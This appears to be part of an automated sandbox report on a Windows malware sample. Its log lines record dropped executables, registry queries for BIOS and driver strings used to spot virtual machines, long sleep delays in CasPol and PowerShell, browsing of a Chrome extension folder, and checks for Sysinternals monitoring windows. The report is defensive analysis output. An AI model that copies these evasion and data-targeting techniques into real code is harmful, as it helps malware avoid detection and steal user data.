Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\4hEl5UUyWTEkI93Zbzcn8KjL.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\oImNnZUwq_S8lQXQ3JQ8PWfa.exe	Jump to dropped file

Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597747	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597591	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597372	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597263	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597027	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596587	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596314	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596195	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595886	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595725	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595068	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593964	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593004	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 592625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 592438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 592312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 592156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591949	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590957	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590208	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589803	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 588891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 588780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 588653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 588413	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 587734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 586219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 585938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 585750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 585576	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 585344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 583813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 583500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 583172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 582906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 582596	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 582422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 582188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 581953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 581547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 581321	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 581128	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 580875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 580578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 580188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 579906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 579764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 579406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 579044	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 578563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 578338	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 578031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 577763	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 577521	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 577154	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 576891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 576469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 576109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 575781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 575500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 575063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 574807	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 574547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 574217	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 573899	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 573678	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 573078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 572563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 572187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 571719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 571317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 568628	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 568222	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 567753	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 567200	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 566887	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 566361	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 565720	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 565173	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 564829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 564431	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 563642	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 563017	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 562501	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 561486	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 561133	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 560704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 560389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 559830	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 559142	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 558689	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 558220	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 557329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 556421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 554874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 553561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 551613	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 549926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 548660	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 547398	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 545719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 543459	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 541676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 539573	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 535870	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 533120	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 531120	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 529432	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 527057	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 525792	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 525120	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 523729	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 522526	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 521198	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 512881	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 508316	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 504441	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 500176	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 496369	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 495879	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 494660	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 492910	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 490707	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 489629	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 488301	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 485957	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 484097	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 482535	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 480863	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 479613	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 478207	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Source: file.exe, 00000000.00000002.1468881299.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: hgFSNI3
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: o-8%16IIOZZ5aW::85(QC0TFG2LOCRS8R3TX6YSS5L3NKXEYV0AOW7EPWHD9I4STVW37NVM0HHA17F5TYX2LQEMUZDAYUTKA3J2X3GLANKHP7MRRMUKVBGCRJIIJUYFX6A7XNHZSM27G77XE5V4V00B
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592634901.00000000011D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C0TFG2LOCRS8R3TX6YSS5L3NKXEYV0AOW7EPWHD9I4STVW37NVM0HHA17F5TYX2LQEMUZDAYUTKA3J2X3GLANKHP7MRRMUKVBGCRJIIJUYFX6A7XNHZSM27G77X

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_0040553A FindFirstFileA,		32_2_0040553A
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,		32_2_004055DE

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe

System information queried: ModuleInformation

Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation
Source: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation

Anti Debugging

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Open window title or class name: filemonclass
